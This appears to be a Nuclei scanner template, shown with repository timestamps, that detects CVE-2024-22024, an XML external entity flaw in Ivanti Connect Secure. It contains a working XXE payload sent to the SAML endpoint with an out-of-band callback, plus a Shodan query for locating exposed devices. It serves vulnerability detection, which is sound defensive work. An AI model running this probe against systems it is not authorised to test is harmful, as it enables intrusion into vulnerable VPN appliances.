nuclei-templates/http/cves/2024/CVE-2024-22024.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2024-22024
info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
2024-02-09 13:14:36 +00:00
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
2024-02-09 08:03:37 +00:00
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti
variables:
2024-02-09 13:14:36 +00:00
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLRequest={{base64(payload)}}
matchers-condition: and
matchers:
- type: word
2024-02-09 08:03:37 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
2024-02-09 08:03:37 +00:00
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950